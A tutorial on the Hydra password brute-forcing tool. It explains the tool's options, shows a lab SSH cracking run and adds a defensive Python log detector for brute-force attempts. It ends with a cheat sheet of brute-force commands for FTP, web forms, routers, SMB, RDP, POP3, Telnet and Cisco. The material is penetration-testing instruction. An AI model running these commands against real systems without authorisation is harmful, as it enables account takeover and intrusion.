Hydra

Remember Hydra, Captain America's villain?

The penetration testing tool introduced today has the same name.

Hydra is a very powerful open-source password brute-forcing tool from the well-known organization THC.

It is installed by default on Kali and supports online cracking of almost all protocols.

Whether a password can be cracked depends on the power of the dictionary and the performance of the computer.

Let's just talk about how this thing works.

Method of use

Syntax: hydra parameters IP service

    -l login   Lowercase: specifies a single user name to crack.
    -L file    Uppercase: specifies the user name dictionary.
    -p pass    Lowercase: specifies a single password. Rarely used; a password dictionary is the usual choice.
    -P file    Uppercase: specifies the password dictionary.
    -e ns      Additional options: n: try an empty password; s: try the user name itself as the password.
    -M file    Specifies a file listing the target IP addresses, to crack in batches.
    -o file    Specifies the output file.
    -f         Stops cracking when the first login name and password pair is found.
    -t tasks   Specifies the number of concurrent threads. Default is 16.
    -w time    Specifies the maximum timeout period.
    -v / -V    Displays the detailed process.
    -R         Continues a previously interrupted task (the session is restored from the hydra.restore file).
    -x         Generates the passwords to try instead of reading them from a dictionary, in the form min:max:charset.

Service: specifies the name of the service. Supported services and protocols include Telnet, FTP, POP3, and so on.

Notes:

1. Create your own dictionary, and put it in the current directory or a specified directory.
2. The parameters can also be placed at the end, in the form hydra IP service parameters.
3. If you already know the user name, for example when cracking a web login, pass it with -l and crack only the password.
4. Disadvantage: if the target website's login requires a verification code, it cannot be cracked.
5. See man hydra.
6. Check a module's help information, for example hydra -U http-form.

Case analysis

Crack the SSH login password

Environment introduction

Kali: the Hydra tool is installed
Target machine: 192.168.154.131, with the SSH service installed and running properly

For testing purposes, we create two simple dictionary files, as follows:

Start blasting

Based on the parameters described above, the command is assembled as follows:

    root@kali:/mnt# hydra -L user.txt -P password.txt -t 2 -vV -e ns 192.168.154.131 ssh

Successful cracking

Because the dictionaries are small, we can crack it easily, but in practice it may take a long time.

Test the login

Log in to the server using the obtained user name and password
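
What the SSH run above looks like from the target's side, as an added example that is not part of the original article: it counts failed sshd password logins per source address inside a time window and records when a flagged source then gets an accepted login. The log lines are constructed, and the source address 192.168.154.130, the threshold, the window and the year are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of sshd auth.log lines (not captured from a real host).
# 192.168.154.130 is an assumed address for the Kali machine.
SAMPLE_LOG = """\
Mar 10 14:02:01 target sshd[2101]: Failed password for root from 192.168.154.130 port 51000 ssh2
Mar 10 14:02:01 target sshd[2102]: Failed password for invalid user admin from 192.168.154.130 port 51002 ssh2
Mar 10 14:02:03 target sshd[2103]: Failed password for root from 192.168.154.130 port 51004 ssh2
Mar 10 14:02:04 target sshd[2104]: Failed password for invalid user test from 192.168.154.130 port 51006 ssh2
Mar 10 14:02:06 target sshd[2105]: Failed password for root from 192.168.154.130 port 51008 ssh2
Mar 10 14:02:07 target sshd[2106]: Accepted password for root from 192.168.154.130 port 51010 ssh2
Mar 10 14:30:00 target sshd[2200]: Failed password for alice from 192.168.154.1 port 40000 ssh2
Mar 10 14:30:20 target sshd[2201]: Accepted password for alice from 192.168.154.1 port 40002 ssh2
"""

LINE = re.compile(
    r"^(\w{3} +\d+ [\d:]{8}) \S+ sshd\[\d+\]: (Failed|Accepted) password for "
    r"(?:invalid user )?(\S+) from (\S+) port \d+")

def detect(log, threshold=5, window=timedelta(seconds=60), year=2024):
    """Return {source_ip: finding} for sources with >= threshold failures in window."""
    fails = defaultdict(list)      # ip -> [(time, user)] of failed logins
    findings = {}
    for line in log.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        stamp, result, user, ip = m.groups()
        t = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
        if result == "Failed":
            fails[ip].append((t, user))
            recent = [(ft, u) for ft, u in fails[ip] if t - ft <= window]
            if len(recent) >= threshold:
                f = findings.setdefault(ip, {"failures": 0, "users": set(), "compromised": None})
                f["failures"] = max(f["failures"], len(recent))
                f["users"] |= {u for _, u in recent}
        elif ip in findings and findings[ip]["compromised"] is None:
            # A success from a source already flagged means a guess worked.
            findings[ip]["compromised"] = user
    return findings

if __name__ == "__main__":
    for ip, f in detect(SAMPLE_LOG).items():
        print(ip, f)
```

A single mistyped password followed by a successful login, as from 192.168.154.1 in the sample, stays below the threshold and is not reported.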

Summary of cracking various protocols

FTP Protocol cracking

To crack FTP, run:

    hydra -L <user name dictionary> -P <password dictionary> -t 6 -e ns <IP address> ftp -v

HTTP Protocol cracking

GET submission, to crack a web login:

    hydra -L <user name dictionary> -P <password dictionary> -t <threads> -v -e ns <IP address> http-get /admin/
    hydra -L <user name dictionary> -P <password dictionary> -t <threads> -v -e ns -f <IP address> http-get
    hydra -f -l <user name> -P <password dictionary> -v -s 9900 <IP address> http-post-form "/admin/index.php?action=login:user=^USER^&pw=^PASS^:<text shown when the login fails>"

In the last command, /admin/index.php... is the login URL. What follows it is the POST data, in which the user name and password are replaced by ^USER^ and ^PASS^. Last comes the text that appears when the login fails. Then cracking starts.

HTTPS Protocol cracking

Crack HTTPS:

    hydra -m /index.php -l <user name> -P <password dictionary>.txt <IP address> https

Router cracking

    hydra -l admin -x '6:10:1a.~!@#$%^&()-=' -t 8 192.168.1.1 http-get /

-l admin is the user name to try to crack.
-x 6:10:1a. ... means the generated passwords consist of digits, lowercase letters, the single character '.', and so on, and are 6-10 characters long.
-t 8 runs the attempts as eight parallel tasks.
192.168.1.1 is the router address.
http-get is the cracking mode (protocol).

HTTP-proxy protocol cracking

Crack http-proxy:

    hydra -l admin -P <dictionary>.txt http-proxy://<IP address>

SMB crack

Crack SMB:

    hydra -L <user name dictionary> -P <password dictionary> <IP address> smb

Windows Remote Desktop

Crack RDP (Windows remote login):

    hydra <IP address> rdp -l administrator -P <password dictionary>.txt -v

Email pop3

Crack a pop3 mailbox:

    hydra -l <user name> -P <password dictionary>.txt my.pop3.mail pop3

Telnet crack

    hydra <IP address> telnet -L <user dictionary>.txt -P <password dictionary>.txt -t 32 -s 23 -e ns -f -v

Teamspeak

    hydra -L <user name dictionary> -P <password dictionary>.txt -s <port number> -vV <IP address> teamspeak

cisco

    hydra -P <password dictionary> <IP address> cisco
    hydra -m cloud -P <password dictionary> <IP address> cisco-enable